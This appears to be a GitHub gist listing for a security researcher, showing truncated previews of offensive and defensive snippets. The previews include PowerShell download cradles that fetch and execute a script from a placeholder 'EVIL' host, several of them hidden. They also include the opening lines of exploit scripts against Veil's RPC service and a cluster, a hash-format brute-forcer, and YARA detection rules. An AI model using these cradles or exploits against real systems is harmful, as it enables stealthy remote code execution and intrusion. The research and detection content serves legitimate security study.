Instantly share code, notes, and snippets.

@bwall Brian Wallace bwall

@bwall bwall / Comparing RF and CNN Adversarial Samples.ipynb
Last active Jun 9, 2018
Comparing RF and CNN Adversarial Samples
View Comparing RF and CNN Adversarial Samples.ipynb
Sorry, something went wrong. Reload?
Sorry, we cannot display this file.
Sorry, this file is invalid so it cannot be displayed.
@bwall bwall / [Work in Progress] Ashes.ipynb
Created May 7, 2018
View [Work in Progress] Ashes.ipynb
Sorry, something went wrong. Reload?
Sorry, we cannot display this file.
Sorry, this file is invalid so it cannot be displayed.
@bwall bwall / DownloadCradles.ps1
Created Jul 12, 2017 — forked from HarmJ0y/DownloadCradles.ps1
Download Cradles
View DownloadCradles.ps1
# normal download cradle
IEX (New-Object Net.Webclient).downloadstring("http://EVIL/evil.ps1")
# PowerShell 3.0+
IEX (iwr 'http://EVIL/evil.ps1')
# hidden IE com object
$ie=New-Object -comobject InternetExplorer.Application;$ie.visible=$False;$ie.navigate('http://EVIL/evil.ps1');start-sleep -s 5;$r=$ie.Document.body.innerHTML;$ie.quit();IEX $r
# Msxml2.XMLHTTP COM object
@bwall bwall / brute_force_hash_encoding.py
Created Jun 6, 2016
Attempt to brute force the hashing/encoding methods for stored passwords
View brute_force_hash_encoding.py
from hashlib import sha1, sha256, sha224, sha384, sha512, md5
from base64 import b64encode, b32encode
digest = "894b186bf79d4337c4f44140a2ec12b42d13a79f".decode("hex")
hexdigest = "894b186bf79d4337c4f44140a2ec12b42d13a79f"
methods = {
"encode_hex": lambda x: x.encode("hex"),
@bwall bwall / Julia_Full_Cluster_Compromise.py
Created Apr 27, 2016
View Julia_Full_Cluster_Compromise.py
import socket
import time
import struct
from random import randint
TCP_IP = "172.16.195.169"
TCP_PORT = 9009
def send_payload(packet):
@bwall bwall / exploit_veil_msfvenom.py
Last active Apr 20, 2016
View exploit_veil_msfvenom.py
import socket
import json
def send_command(command, ip="127.0.0.1", port=4242):
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((ip, port))
print json.dumps(command)
s.send(json.dumps(command))
s.close()
@bwall bwall / exploit_veil_pescrambler.py
Last active Apr 13, 2016
View exploit_veil_pescrambler.py
import socket
import json
def send_command(command, ip="127.0.0.1", port=4242):
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((ip, port))
print json.dumps(command)
s.send(json.dumps(command))
s.close()
@bwall bwall / exploit_veil_hyperion.py
Last active Apr 13, 2016
View exploit_veil_hyperion.py
import socket
import json
def send_command(command, ip="127.0.0.1", port=4242):
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((ip, port))
print json.dumps(command)
s.send(json.dumps(command))
s.close()
@bwall bwall / pocs.py
Last active Apr 1, 2016
Proof of concepts for recently released Veil RPC vulnerabilities
View pocs.py
import socket
import json
def send_command(command, ip="127.0.0.1", port=4242):
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((ip, port))
print json.dumps(command)
s.send(json.dumps(command))
s.close()
@bwall bwall / operation_dust_storm.yara
Created Feb 26, 2016
Operation Dust Storm (https://www.cylance.com/operation-dust-storm) YARA Rules
View operation_dust_storm.yara
rule Misdat_Backdoor_Packed
{
meta:
author = "Cylance SPEAR Team"
note = "Probably Prone to False Positive"
strings:
$upx = {33 2E 30 33 00 55 50 58 21}
$send = {00 00 00 73 65 6E 64 00 00 00}
$delphi_sec_pe = {50 45 00 00 4C 01 03 00 19 5E 42 2A}